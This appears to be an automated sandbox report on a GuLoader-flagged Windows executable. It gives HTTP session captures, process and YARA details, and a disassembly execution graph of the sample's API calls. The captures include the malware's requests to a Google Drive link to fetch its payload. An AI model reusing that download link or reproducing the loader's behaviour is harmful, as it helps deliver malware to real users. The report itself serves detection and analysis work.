                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-11 04:15:24 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 64 4b 6a 6f 38 41 69 78 43 6e 58 5a 43 62 31 30 5a 33 43 4e 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="udKjo8AixCnXZCb10Z3CNw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        24192.168.2.450026142.250.184.2064437776C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-11 04:15:35 UTC422OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:15:35 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:15:35 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-EwlLgwpUBVkqVK0btTwUeQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        25192.168.2.450027172.217.16.1934437776C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-11 04:15:36 UTC464OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:15:36 UTC1851INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC5HpEDFlNl_sVXkrI_HxMYa_wWbg_RuyUaMYs-q7tV_i2PoLblnkXgfaeHsY65fH1_qXIcgRJ0
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:15:36 GMT
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-huVe7-4IFBVgTTNQZDWENQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-11 04:15:36 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 34 62 38 35 45 54 48 56 73 46 49 6e 4d 47 44 50 56 48 73 42 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="u4b85ETHVsFInMGDPVHsBA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:23:12:39
                                                        Start date:10/01/2025
                                                        Path:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\QNuQ5e175D.exe"
                                                        Imagebase:0x400000
                                                        File size:585'064 bytes
                                                        MD5 hash:9BB2CDB8508EE2255A35ECEC43462A48
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1944070834.000000000456C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:4
                                                        Start time:23:13:02
                                                        Start date:10/01/2025
                                                        Path:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\QNuQ5e175D.exe"
                                                        Imagebase:0x400000
                                                        File size:585'064 bytes
                                                        MD5 hash:9BB2CDB8508EE2255A35ECEC43462A48
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.3567436763.00000000017EC000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:false

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:22.3%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:16%
                                                          Total number of Nodes:1575
                                                          Total number of Limit Nodes:40
                                                          execution_graph 3940 401bc0 3941 401c11 3940->3941 3942 401bcd 3940->3942 3944 401c16 3941->3944 3945 401c3b GlobalAlloc 3941->3945 3943 4023af 3942->3943 3949 401be4 3942->3949 3946 4065b4 21 API calls 3943->3946 3953 401c56 3944->3953 3978 406577 lstrcpynW 3944->3978 3959 4065b4 3945->3959 3948 4023bc 3946->3948 3948->3953 3979 405bd7 3948->3979 3976 406577 lstrcpynW 3949->3976 3952 401c28 GlobalFree 3952->3953 3955 401bf3 3977 406577 lstrcpynW 3955->3977 3957 401c02 3983 406577 lstrcpynW 3957->3983 3964 4065bf 3959->3964 3960 406806 3961 40681f 3960->3961 4006 406577 lstrcpynW 3960->4006 3961->3953 3963 4067d7 lstrlenW 3963->3964 3964->3960 3964->3963 3965 4066d0 GetSystemDirectoryW 3964->3965 3966 4065b4 15 API calls 3964->3966 3970 4066e6 GetWindowsDirectoryW 3964->3970 3971 406778 lstrcatW 3964->3971 3973 4065b4 15 API calls 3964->3973 3975 406748 SHGetPathFromIDListW CoTaskMemFree 3964->3975 3984 406445 3964->3984 3989 40696b GetModuleHandleA 3964->3989 3995 406825 3964->3995 4004 4064be wsprintfW 3964->4004 4005 406577 lstrcpynW 3964->4005 3965->3964 3966->3963 3970->3964 3971->3964 3973->3964 3975->3964 3976->3955 3977->3957 3978->3952 3982 405bec 3979->3982 3980 405c38 3980->3953 3981 405c00 MessageBoxIndirectW 3981->3980 3982->3980 3982->3981 3983->3953 4007 4063e4 3984->4007 3987 4064a9 3987->3964 3988 406479 RegQueryValueExW RegCloseKey 3988->3987 3990 406991 GetProcAddress 3989->3990 3991 406987 3989->3991 3993 4069a0 3990->3993 4011 4068fb GetSystemDirectoryW 3991->4011 3993->3964 3994 40698d 3994->3990 3994->3993 4002 406832 3995->4002 3996 4068a8 3997 4068ad CharPrevW 3996->3997 4000 4068ce 3996->4000 3997->3996 3998 40689b CharNextW 3998->3996 3998->4002 4000->3964 4001 406887 CharNextW 4001->4002 4002->3996 4002->3998 4002->4001 4003 406896 CharNextW 4002->4003 4014 405e73 4002->4014 4003->3998 4004->3964 4005->3964 4006->3961 4008 4063f3 4007->4008 4009 4063f7 4008->4009 4010 4063fc RegOpenKeyExW 4008->4010 4009->3987 4009->3988 4010->4009 4012 40691d wsprintfW LoadLibraryExW 4011->4012 4012->3994 4015 405e79 4014->4015 4016 405e8f 4015->4016 4017 405e80 CharNextW 4015->4017 4016->4002 4017->4015 5073 402641 5074 402dcb 21 API calls 5073->5074 5075 402648 5074->5075 5078 406067 GetFileAttributesW CreateFileW 5075->5078 5077 402654 5078->5077 4034 4025c3 4046 402e0b 4034->4046 4038 4025d6 4039 4025e5 4038->4039 4044 402953 4038->4044 4040 4025f2 RegEnumKeyW 4039->4040 4041 4025fe RegEnumValueW 4039->4041 4042 40261a RegCloseKey 4040->4042 4041->4042 4043 402613 4041->4043 4042->4044 4043->4042 4047 402dcb 21 API calls 4046->4047 4048 402e22 4047->4048 4049 4063e4 RegOpenKeyExW 4048->4049 4050 4025cd 4049->4050 4051 402da9 4050->4051 4052 4065b4 21 API calls 4051->4052 4053 402dbe 4052->4053 4053->4038 5079 6fc42d43 5080 6fc42d5b 5079->5080 5081 6fc4162f 2 API calls 5080->5081 5082 6fc42d76 5081->5082 4062 4015c8 4063 402dcb 21 API calls 4062->4063 4064 4015cf SetFileAttributesW 4063->4064 4065 4015e1 4064->4065 4066 401fc9 4067 402dcb 21 API calls 4066->4067 4068 401fcf 4067->4068 4081 4055fc 4068->4081 4072 402953 4074 402002 CloseHandle 4074->4072 4077 401ff4 4078 402004 4077->4078 4079 401ff9 4077->4079 4078->4074 4100 4064be wsprintfW 4079->4100 4082 405617 4081->4082 4083 401fd9 4081->4083 4084 405633 lstrlenW 4082->4084 4085 4065b4 21 API calls 4082->4085 4092 405b5a CreateProcessW 4083->4092 4086 405641 lstrlenW 4084->4086 4087 40565c 4084->4087 4085->4084 4086->4083 4088 405653 lstrcatW 4086->4088 4089 405662 SetWindowTextW 4087->4089 4090 40566f 4087->4090 4088->4087 4089->4090 4090->4083 4091 405675 SendMessageW SendMessageW SendMessageW 4090->4091 4091->4083 4093 401fdf 4092->4093 4094 405b8d CloseHandle 4092->4094 4093->4072 4093->4074 4095 406a16 WaitForSingleObject 4093->4095 4094->4093 4096 406a30 4095->4096 4097 406a42 GetExitCodeProcess 4096->4097 4101 4069a7 4096->4101 4097->4077 4100->4074 4102 4069c4 PeekMessageW 4101->4102 4103 4069d4 WaitForSingleObject 4102->4103 4104 4069ba DispatchMessageW 4102->4104 4103->4096 4104->4102 4105 40254f 4106 402e0b 21 API calls 4105->4106 4107 402559 4106->4107 4108 402dcb 21 API calls 4107->4108 4109 402562 4108->4109 4110 402953 4109->4110 4111 40256d RegQueryValueExW 4109->4111 4112 40258d 4111->4112 4115 402593 RegCloseKey 4111->4115 4112->4115 4116 4064be wsprintfW 4112->4116 4115->4110 4116->4115 5086 40204f 5087 402dcb 21 API calls 5086->5087 5088 402056 5087->5088 5089 40696b 5 API calls 5088->5089 5090 402065 5089->5090 5091 402081 GlobalAlloc 5090->5091 5092 4020f1 5090->5092 5091->5092 5093 402095 5091->5093 5094 40696b 5 API calls 5093->5094 5095 40209c 5094->5095 5096 40696b 5 API calls 5095->5096 5097 4020a6 5096->5097 5097->5092 5101 4064be wsprintfW 5097->5101 5099 4020df 5102 4064be wsprintfW 5099->5102 5101->5099 5102->5092 5103 4021cf 5104 402dcb 21 API calls 5103->5104 5105 4021d6 5104->5105 5106 402dcb 21 API calls 5105->5106 5107 4021e0 5106->5107 5108 402dcb 21 API calls 5107->5108 5109 4021ea 5108->5109 5110 402dcb 21 API calls 5109->5110 5111 4021f4 5110->5111 5112 402dcb 21 API calls 5111->5112 5113 4021fe 5112->5113 5114 40223d CoCreateInstance 5113->5114 5115 402dcb 21 API calls 5113->5115 5118 40225c 5114->5118 5115->5114 5116 401423 28 API calls 5117 40231b 5116->5117 5118->5116 5118->5117 4145 403552 SetErrorMode GetVersionExW 4146 4035a6 GetVersionExW 4145->4146 4147 4035de 4145->4147 4146->4147 4148 403635 4147->4148 4149 40696b 5 API calls 4147->4149 4150 4068fb 3 API calls 4148->4150 4149->4148 4151 40364b lstrlenA 4150->4151 4151->4148 4152 40365b 4151->4152 4153 40696b 5 API calls 4152->4153 4154 403662 4153->4154 4155 40696b 5 API calls 4154->4155 4156 403669 4155->4156 4157 40696b 5 API calls 4156->4157 4160 403675 #17 OleInitialize SHGetFileInfoW 4157->4160 4233 406577 lstrcpynW 4160->4233 4161 4036c4 GetCommandLineW 4234 406577 lstrcpynW 4161->4234 4163 4036d6 4164 405e73 CharNextW 4163->4164 4165 4036fc CharNextW 4164->4165 4170 40370e 4165->4170 4166 403810 4167 403824 GetTempPathW 4166->4167 4235 403521 4167->4235 4169 40383c 4171 403840 GetWindowsDirectoryW lstrcatW 4169->4171 4172 403896 DeleteFileW 4169->4172 4170->4166 4173 405e73 CharNextW 4170->4173 4180 403812 4170->4180 4174 403521 12 API calls 4171->4174 4245 4030a2 GetTickCount GetModuleFileNameW 4172->4245 4173->4170 4176 40385c 4174->4176 4176->4172 4179 403860 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4176->4179 4177 4038aa 4178 403961 4177->4178 4181 403951 4177->4181 4185 405e73 CharNextW 4177->4185 4404 403b6f 4178->4404 4183 403521 12 API calls 4179->4183 4329 406577 lstrcpynW 4180->4329 4273 403c49 4181->4273 4187 40388e 4183->4187 4200 4038c9 4185->4200 4187->4172 4187->4178 4189 403ad3 4192 403b57 ExitProcess 4189->4192 4193 403adb GetCurrentProcess OpenProcessToken 4189->4193 4190 403aaf 4191 405bd7 MessageBoxIndirectW 4190->4191 4195 403abd ExitProcess 4191->4195 4196 403af3 LookupPrivilegeValueW AdjustTokenPrivileges 4193->4196 4197 403b27 4193->4197 4196->4197 4202 40696b 5 API calls 4197->4202 4198 403927 4330 405f4e 4198->4330 4199 40396a 4346 405b42 4199->4346 4200->4198 4200->4199 4205 403b2e 4202->4205 4208 403b43 ExitWindowsEx 4205->4208 4210 403b50 4205->4210 4208->4192 4208->4210 4209 403989 4212 4039a1 4209->4212 4350 406577 lstrcpynW 4209->4350 4411 40140b 4210->4411 4217 4039c7 wsprintfW 4212->4217 4226 4039f3 4212->4226 4214 403946 4345 406577 lstrcpynW 4214->4345 4218 4065b4 21 API calls 4217->4218 4218->4212 4221 403a03 GetFileAttributesW 4223 403a0f DeleteFileW 4221->4223 4221->4226 4222 403a3d SetCurrentDirectoryW 4397 406337 MoveFileExW 4222->4397 4223->4226 4226->4178 4226->4212 4226->4217 4226->4221 4226->4222 4228 406337 40 API calls 4226->4228 4229 4065b4 21 API calls 4226->4229 4230 405b5a 2 API calls 4226->4230 4231 403ac5 CloseHandle 4226->4231 4351 405acb CreateDirectoryW 4226->4351 4354 405b25 CreateDirectoryW 4226->4354 4357 405c83 4226->4357 4401 4068d4 FindFirstFileW 4226->4401 4228->4226 4229->4226 4230->4226 4231->4178 4233->4161 4234->4163 4236 406825 5 API calls 4235->4236 4238 40352d 4236->4238 4237 403537 4237->4169 4238->4237 4414 405e46 lstrlenW CharPrevW 4238->4414 4241 405b25 2 API calls 4242 403545 4241->4242 4243 406096 2 API calls 4242->4243 4244 403550 4243->4244 4244->4169 4417 406067 GetFileAttributesW CreateFileW 4245->4417 4247 4030e2 4272 4030f2 4247->4272 4418 406577 lstrcpynW 4247->4418 4249 403108 4419 405e92 lstrlenW 4249->4419 4253 403119 GetFileSize 4265 403130 4253->4265 4269 403213 4253->4269 4255 40321c 4257 40324c GlobalAlloc 4255->4257 4255->4272 4459 40350a SetFilePointer 4255->4459 4435 40350a SetFilePointer 4257->4435 4259 40327f 4261 40303e 6 API calls 4259->4261 4261->4272 4262 403235 4264 4034f4 ReadFile 4262->4264 4263 403267 4436 4032d9 4263->4436 4267 403240 4264->4267 4265->4259 4268 40303e 6 API calls 4265->4268 4265->4269 4265->4272 4456 4034f4 4265->4456 4267->4257 4267->4272 4268->4265 4424 40303e 4269->4424 4270 403273 4270->4270 4271 4032b0 SetFilePointer 4270->4271 4270->4272 4271->4272 4272->4177 4274 40696b 5 API calls 4273->4274 4275 403c5d 4274->4275 4276 403c63 4275->4276 4277 403c75 4275->4277 4476 4064be wsprintfW 4276->4476 4278 406445 3 API calls 4277->4278 4279 403ca5 4278->4279 4281 403cc4 lstrcatW 4279->4281 4283 406445 3 API calls 4279->4283 4282 403c73 4281->4282 4461 403f1f 4282->4461 4283->4281 4286 405f4e 18 API calls 4287 403cf6 4286->4287 4288 403d8a 4287->4288 4290 406445 3 API calls 4287->4290 4289 405f4e 18 API calls 4288->4289 4291 403d90 4289->4291 4292 403d28 4290->4292 4293 403da0 LoadImageW 4291->4293 4294 4065b4 21 API calls 4291->4294 4292->4288 4297 403d49 lstrlenW 4292->4297 4300 405e73 CharNextW 4292->4300 4295 403e46 4293->4295 4296 403dc7 RegisterClassW 4293->4296 4294->4293 4299 40140b 2 API calls 4295->4299 4298 403dfd SystemParametersInfoW CreateWindowExW 4296->4298 4328 403e50 4296->4328 4301 403d57 lstrcmpiW 4297->4301 4302 403d7d 4297->4302 4298->4295 4303 403e4c 4299->4303 4304 403d46 4300->4304 4301->4302 4305 403d67 GetFileAttributesW 4301->4305 4306 405e46 3 API calls 4302->4306 4308 403f1f 22 API calls 4303->4308 4303->4328 4304->4297 4307 403d73 4305->4307 4309 403d83 4306->4309 4307->4302 4311 405e92 2 API calls 4307->4311 4312 403e5d 4308->4312 4477 406577 lstrcpynW 4309->4477 4311->4302 4313 403e69 ShowWindow 4312->4313 4314 403eec 4312->4314 4315 4068fb 3 API calls 4313->4315 4469 4056cf OleInitialize 4314->4469 4317 403e81 4315->4317 4319 403e8f GetClassInfoW 4317->4319 4322 4068fb 3 API calls 4317->4322 4318 403ef2 4320 403ef6 4318->4320 4321 403f0e 4318->4321 4324 403ea3 GetClassInfoW RegisterClassW 4319->4324 4325 403eb9 DialogBoxParamW 4319->4325 4326 40140b 2 API calls 4320->4326 4320->4328 4323 40140b 2 API calls 4321->4323 4322->4319 4323->4328 4324->4325 4327 40140b 2 API calls 4325->4327 4326->4328 4327->4328 4328->4178 4329->4167 4489 406577 lstrcpynW 4330->4489 4332 405f5f 4490 405ef1 CharNextW CharNextW 4332->4490 4335 403933 4335->4178 4344 406577 lstrcpynW 4335->4344 4336 406825 5 API calls 4342 405f75 4336->4342 4337 405fa6 lstrlenW 4338 405fb1 4337->4338 4337->4342 4339 405e46 3 API calls 4338->4339 4341 405fb6 GetFileAttributesW 4339->4341 4340 4068d4 2 API calls 4340->4342 4341->4335 4342->4335 4342->4337 4342->4340 4343 405e92 2 API calls 4342->4343 4343->4337 4344->4214 4345->4181 4347 40696b 5 API calls 4346->4347 4348 40396f lstrlenW 4347->4348 4349 406577 lstrcpynW 4348->4349 4349->4209 4350->4212 4352 405b17 4351->4352 4353 405b1b GetLastError 4351->4353 4352->4226 4353->4352 4355 405b35 4354->4355 4356 405b39 GetLastError 4354->4356 4355->4226 4356->4355 4358 405f4e 18 API calls 4357->4358 4359 405ca3 4358->4359 4360 405cc2 4359->4360 4361 405cab DeleteFileW 4359->4361 4366 405ded 4360->4366 4496 406577 lstrcpynW 4360->4496 4367 405df9 4361->4367 4363 405ce8 4364 405cfb 4363->4364 4365 405cee lstrcatW 4363->4365 4369 405e92 2 API calls 4364->4369 4368 405d01 4365->4368 4366->4367 4370 4068d4 2 API calls 4366->4370 4367->4226 4371 405d11 lstrcatW 4368->4371 4372 405d07 4368->4372 4369->4368 4373 405e07 4370->4373 4375 405d1c lstrlenW FindFirstFileW 4371->4375 4372->4371 4372->4375 4373->4367 4374 405e0b 4373->4374 4376 405e46 3 API calls 4374->4376 4377 405de2 4375->4377 4395 405d3e 4375->4395 4378 405e11 4376->4378 4377->4366 4380 405c3b 5 API calls 4378->4380 4379 405dc5 FindNextFileW 4383 405ddb FindClose 4379->4383 4379->4395 4382 405e1d 4380->4382 4384 405e21 4382->4384 4385 405e37 4382->4385 4383->4377 4384->4367 4388 4055fc 28 API calls 4384->4388 4387 4055fc 28 API calls 4385->4387 4387->4367 4390 405e2e 4388->4390 4389 405c83 64 API calls 4389->4395 4392 406337 40 API calls 4390->4392 4391 4055fc 28 API calls 4391->4379 4393 405e35 4392->4393 4393->4367 4394 4055fc 28 API calls 4394->4395 4395->4379 4395->4389 4395->4391 4395->4394 4396 406337 40 API calls 4395->4396 4497 406577 lstrcpynW 4395->4497 4498 405c3b 4395->4498 4396->4395 4398 40634b 4397->4398 4400 403a4c CopyFileW 4397->4400 4509 4061bd 4398->4509 4400->4178 4400->4226 4402 4068ea FindClose 4401->4402 4403 4068f5 4401->4403 4402->4403 4403->4226 4405 403b87 4404->4405 4406 403b79 CloseHandle 4404->4406 4543 403bb4 4405->4543 4406->4405 4409 405c83 71 API calls 4410 403aa2 OleUninitialize 4409->4410 4410->4189 4410->4190 4412 401389 2 API calls 4411->4412 4413 401420 4412->4413 4413->4192 4415 405e62 lstrcatW 4414->4415 4416 40353f 4414->4416 4415->4416 4416->4241 4417->4247 4418->4249 4420 405ea0 4419->4420 4421 40310e 4420->4421 4422 405ea6 CharPrevW 4420->4422 4423 406577 lstrcpynW 4421->4423 4422->4420 4422->4421 4423->4253 4425 403047 4424->4425 4426 40305f 4424->4426 4427 403050 DestroyWindow 4425->4427 4428 403057 4425->4428 4429 403067 4426->4429 4430 40306f GetTickCount 4426->4430 4427->4428 4428->4255 4433 4069a7 2 API calls 4429->4433 4431 4030a0 4430->4431 4432 40307d CreateDialogParamW ShowWindow 4430->4432 4431->4255 4432->4431 4434 40306d 4433->4434 4434->4255 4435->4263 4438 4032f2 4436->4438 4437 403320 4440 4034f4 ReadFile 4437->4440 4438->4437 4460 40350a SetFilePointer 4438->4460 4441 40332b 4440->4441 4442 40348d 4441->4442 4443 40333d GetTickCount 4441->4443 4444 403477 4441->4444 4445 4034cf 4442->4445 4448 403491 4442->4448 4443->4444 4452 40338c 4443->4452 4444->4270 4447 4034f4 ReadFile 4445->4447 4446 4034f4 ReadFile 4446->4452 4447->4444 4448->4444 4449 4034f4 ReadFile 4448->4449 4450 406119 WriteFile 4448->4450 4449->4448 4450->4448 4451 4033e2 GetTickCount 4451->4452 4452->4444 4452->4446 4452->4451 4453 403407 MulDiv wsprintfW 4452->4453 4455 406119 WriteFile 4452->4455 4454 4055fc 28 API calls 4453->4454 4454->4452 4455->4452 4457 4060ea ReadFile 4456->4457 4458 403507 4457->4458 4458->4265 4459->4262 4460->4437 4462 403f33 4461->4462 4478 4064be wsprintfW 4462->4478 4464 403fa4 4479 403fd8 4464->4479 4466 403cd4 4466->4286 4467 403fa9 4467->4466 4468 4065b4 21 API calls 4467->4468 4468->4467 4482 404542 4469->4482 4471 404542 SendMessageW 4472 40572b OleUninitialize 4471->4472 4472->4318 4474 405719 4474->4471 4475 4056f2 4475->4474 4485 401389 4475->4485 4476->4282 4477->4288 4478->4464 4480 4065b4 21 API calls 4479->4480 4481 403fe6 SetWindowTextW 4480->4481 4481->4467 4483 40455a 4482->4483 4484 40454b SendMessageW 4482->4484 4483->4475 4484->4483 4487 401390 4485->4487 4486 4013fe 4486->4475 4487->4486 4488 4013cb MulDiv SendMessageW 4487->4488 4488->4487 4489->4332 4491 405f20 4490->4491 4492 405f0e 4490->4492 4494 405e73 CharNextW 4491->4494 4495 405f44 4491->4495 4492->4491 4493 405f1b CharNextW 4492->4493 4493->4495 4494->4491 4495->4335 4495->4336 4496->4363 4497->4395 4506 406042 GetFileAttributesW 4498->4506 4501 405c68 4501->4395 4502 405c56 RemoveDirectoryW 4504 405c64 4502->4504 4503 405c5e DeleteFileW 4503->4504 4504->4501 4505 405c74 SetFileAttributesW 4504->4505 4505->4501 4507 405c47 4506->4507 4508 406054 SetFileAttributesW 4506->4508 4507->4501 4507->4502 4507->4503 